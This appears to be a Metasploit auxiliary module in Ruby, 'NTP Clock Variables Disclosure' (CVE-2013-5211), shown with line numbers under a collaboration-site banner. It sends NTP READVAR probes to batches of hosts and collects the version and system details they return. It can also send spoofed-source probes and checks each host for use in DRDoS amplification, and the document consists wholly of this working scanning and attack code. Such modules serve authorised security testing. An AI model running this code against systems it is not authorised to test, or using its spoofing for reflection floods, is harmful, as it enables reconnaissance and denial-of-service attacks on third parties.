Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Report
8
  include Msf::Exploit::Remote::Udp
9
  include Msf::Auxiliary::UDPScanner
10
  include Msf::Auxiliary::NTP
11
  include Msf::Auxiliary::DRDoS
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'NTP Clock Variables Disclosure',
16
      'Description'    => %q(
17
        This module reads the system internal NTP variables. These variables contain
18
        potentially sensitive information, such as the NTP software version, operating
19
        system version, peers, and more.
20
      ),
21
      'Author'         =>
22
        [
23
          'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>', # original Metasploit module
24
          'Jon Hart <jon_hart[at]rapid7.com>' # UDPScanner version for faster scans
25
        ],
26
      'License'        => MSF_LICENSE,
27
      'References'     =>
28
        [
29
          ['CVE', '2013-5211'], # see also scanner/ntp/ntp_monlist.rb
30
          [ 'URL', 'https://www.rapid7.com/db/vulnerabilities/ntp-clock-variables-disclosure/' ]
31
        ]
32
      )
33
    )
34
  end
35

36
  def scanner_process(data, shost, _sport)
37
    @results[shost] ||= []
38
    @results[shost] << Rex::Proto::NTP::NTPControl.new.read(data)
39
  end
40

41
  def scan_host(ip)
42
    if spoofed?
43
      datastore['ScannerRecvWindow'] = 0
44
      scanner_spoof_send(@probe, ip, datastore['RPORT'], datastore['SRCIP'], datastore['NUM_REQUESTS'])
45
    else
46
      scanner_send(@probe, ip, datastore['RPORT'])
47
    end
48
  end
49

50
  def scanner_prescan(batch)
51
    @results = {}
52
    print_status("Sending NTP v2 READVAR probes to #{batch[0]}->#{batch[-1]} (#{batch.length} hosts)")
53
    @probe = Rex::Proto::NTP::NTPControl.new
54
    @probe.version = datastore['VERSION']
55
    @probe.operation = 2
56
  end
57

58
  def scanner_postscan(_batch)
59
    @results.keys.each do |k|
60
      # TODO: check to see if any of the responses are actually NTP before reporting
61
      report_service(
62
        host: k,
63
        proto: 'udp',
64
        port: rport,
65
        name: 'ntp',
66
        info: @results[k].map { |r| r.payload.slice(0,r.payload_size) }.join.inspect
67
      )
68

69
      peer = "#{k}:#{rport}"
70
      response_map = { @probe => @results[k] }
71
      vulnerable, proof = prove_amplification(response_map)
72
      what = 'NTP Mode 6 READVAR DRDoS'
73
      if vulnerable
74
        print_good("#{peer} - Vulnerable to #{what}: #{proof}")
75
        report_vuln(
76
          host: k,
77
          port: rport,
78
          proto: 'udp',
79
          name: what,
80
          refs: references
81
        )
82
      else
83
        vprint_status("#{peer} - Not vulnerable to #{what}: #{proof}")
84
      end
85
    end
86
  end
87
end
88

89